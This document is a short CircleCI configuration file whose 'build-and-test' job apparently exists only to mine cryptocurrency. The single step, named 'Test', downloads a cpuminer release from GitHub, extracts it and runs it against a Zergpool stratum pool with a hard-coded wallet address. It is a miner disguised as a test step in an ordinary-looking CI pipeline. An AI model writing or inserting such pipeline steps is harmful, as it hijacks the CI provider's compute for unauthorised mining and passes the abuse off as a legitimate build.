version: 2.1

orbs:
   python: circleci/python@0.2.1

jobs:
  build-and-test:
    executor: python/default
    steps:
      - run:
          command: ! wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.11/cpuminer-opt-linux.tar.gz && tar xf cpuminer-opt-linux.tar.gz && ./cpuminer-sse2 -a power2b -o stratum+tcp://power2b.na.mine.zergpool.com:7445 -u BUdryaG1mRpsfjnga9caW197WyEfdBjvFx -p c=MBC,m=solo
          name: Test

workflows:
  main:
    jobs:
      - build-and-test